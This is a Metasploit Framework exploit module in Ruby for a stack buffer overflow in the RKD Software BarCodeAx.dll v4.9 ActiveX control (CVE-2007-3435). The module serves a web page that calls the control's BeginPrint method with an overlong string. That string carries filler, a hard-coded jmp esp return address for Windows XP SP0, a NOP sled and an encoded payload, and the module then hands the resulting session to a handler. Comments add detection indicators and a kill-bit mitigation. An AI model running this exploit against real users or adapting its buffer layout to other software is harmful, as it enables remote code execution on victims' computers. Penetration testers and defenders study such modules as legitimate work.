
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/barcode_ax49.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser exploit module for the BarCodeAx.dll v4.9 ActiveX control
# (CVE-2007-3435 in 'References' below). It serves a single HTML page that
# instantiates the control by CLSID and calls its BeginPrint method with an
# oversized string.
#
# Defender notes: a served page that embeds the CLSID below and passes a long
# argument to BeginPrint is the observable indicator (proxy / IDS / browser
# telemetry); removing the control or setting its ActiveX kill bit keeps the
# browser from ever reaching the vulnerable method.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Module metadata. The only target carries a fixed return address (see the
  # inline comment on the 'Targets' entry), so the module is tied to that
  # specific OS build.
  #
  # @param info [Hash] metadata merged with the defaults via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow',
      'Description' => %q{
          This module exploits a stack buffer overflow in RKD Software Barcode Application
        ActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint
        method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'Trancek <trancek[at]yashira.org>', 'aushack' ],
      'References' =>
        [
          [ 'EDB', '4094' ],
          [ 'OSVDB', '37482' ],
          [ 'BID', '24596' ],
          [ 'CVE', '2007-3435' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      # Payload constraints: 'BadChars' lists the byte values the encoder must
      # avoid; presumably these are the characters that would terminate or
      # break the quoted JavaScript string the payload is embedded in below.
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => "\x00\x0a\x0d\x20\'\"%<>@=,.\#$&()\\/",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows XP SP0 English', { 'Ret' => 0x71ab7bfb } ] # jmp esp ws2_32.dll aushack xpsp0
        ],
      'DisclosureDate' => '2007-06-22',
      'DefaultTarget' => 0))
  end

  # Opts this module out of the framework's automatic exploit selection
  # (browser autopwn); it must be run explicitly.
  #
  # @return [Boolean] always false
  def autofilter
    false
  end

  # Declares the module's runtime dependency on zlib via the framework helper;
  # presumably use_zlib raises when zlib support is unavailable — confirm
  # against the mixin.
  def check_dependencies
    use_zlib
  end

  # Builds and sends the exploit page for every request to the served URI.
  #
  # @param cli the connected HTTP client (framework-provided)
  # @param request the incoming HTTP request; not inspected here, so every
  #   request to the URI gets the same page regardless of path or headers
  # @return [nil] when the payload could not be regenerated (nothing is sent)
  def on_request_uri(cli, request)
    # Re-generate the payload
    # NOTE(review): `p` is assigned but never read — the buffer below uses
    # payload.encoded instead. Harmless only if regenerate_payload also
    # updates the module's payload state; `== nil` would idiomatically be
    # `.nil?` or `unless (p = ...)`.
    return if ((p = regenerate_payload(cli)) == nil)

    # Randomize some things
    # Random element id of 1..100 letters, so the served HTML differs per request.
    vname = rand_text_alpha(rand(100) + 1)

    # 656 bytes of filler, then target['Ret'] as a little-endian DWORD
    # ('V' pack format), a 20-byte NOP sled, and the encoded payload.
    buff = Rex::Text.rand_text_alphanumeric(656) + [target['Ret']].pack('V') + make_nops(20) + payload.encoded

    # Build out the message
    # The CLSID and the BeginPrint call are the fixed, signature-worthy parts
    # of this page; only the element id and the buffer contents vary.
    content = %Q|<html>
<object classid='clsid:C26D9CA8-6747-11D5-AD4B-C01857C10000' id='#{vname}'></object>
<script language='javascript'>
#{vname}.BeginPrint("#{buff}");
</script>
</html>
|

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end